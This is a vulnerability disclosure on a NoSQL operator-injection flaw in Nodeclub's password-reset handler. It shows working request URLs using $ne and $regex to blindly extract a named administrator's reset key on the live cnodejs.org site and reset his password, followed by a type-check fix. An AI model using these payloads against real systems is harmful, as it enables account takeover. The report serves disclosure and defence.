Nodeclub injection vulnerability allows any user's password to be reset
Nodeclub (https://github.com/cnodejs/nodeclub/) may only be used by a small number of people, but it is worth a look. Download the nodeclub source code from GitHub and open controllers/sign.js:
exports.reset_pass = function (req, res, next) {
  var key = req.query.key;
  var name = req.query.name;
  User.getUserByNameAndKey(name, key, function (err, user) {
    if (!user) {
      res.status(403);
      return res.render('notify/notify', {error: 'The information is incorrect; the password cannot be reset.'});
    }
    // ... remainder of the handler omitted in the original report
  });
};
We can see that key and name are taken straight from the query string and passed to User.getUserByNameAndKey in proxy/user.js without any type or format check:
exports.getUserByNameAndKey = function (loginname, key, callback) {
  User.findOne({loginname: loginname, retrieve_key: key}, callback);
};
To test this problem, we first choose one of the cnodejs administrators, alsotang, as the target. From his GitHub profile we know that his mailbox is alsotang@gmail.com, so we submit that mailbox to the password-retrieval page at https://cnodejs.org/search_pass, which generates a retrieve_key for the account.
Next, given the missing checks above, it is not hard to construct the following request: https://cnodejs.org/reset_pass?name=alsotang&key[$ne]=111111111. Here name is the target user name. Express's query-string parser turns key[$ne]=111111111 into the object {key: {$ne: '111111111'}}, which Mongoose passes on to MongoDB as a comparison operator, so the condition becomes "retrieve_key is not equal to 111111111". That matches the target's record, and a normal page is returned.
If instead we send a plain random key, for example https://cnodejs.org/reset_pass?name=alsotang&key=111111111, an error page is returned.
This difference in responses lets us extract the key parameter blindly, one character at a time, with $regex. For example:
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5 returns the normal page
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^6 returns the error page
https://cnodejs.org/reset_pass?name[$regex]=^alsotang&key[$regex]=^5f returns the normal page
... and so on, extending the known prefix whenever the normal page comes back. The test script is attached to the original report ("test code"). After running the program we obtain the key (screenshot in the original report omitted here).
We then use that key to reset the password. The password is reset to wooyun and we log in with it.
See the personal introduction at https://cnodejs.org/user/alsotang.
Solution: reject the request unless key and name are plain strings before they reach getUserByNameAndKey, so that an operator object such as {$ne: ...} or {$regex: ...} produced by the query parser can never be passed to Mongoose (the original report's snippet was cut short; the type check completes it):
exports.reset_pass = function (req, res, next) {
  var key = req.query.key;
  var name = req.query.name;
  if (typeof key !== 'string' || typeof name !== 'string') {
    res.status(403);
    return res.render('notify/notify', {error: 'The information is incorrect; the password cannot be reset.'});
  }
  User.getUserByNameAndKey(name, key, function (err, user) {
    // ... unchanged handler body
  });
};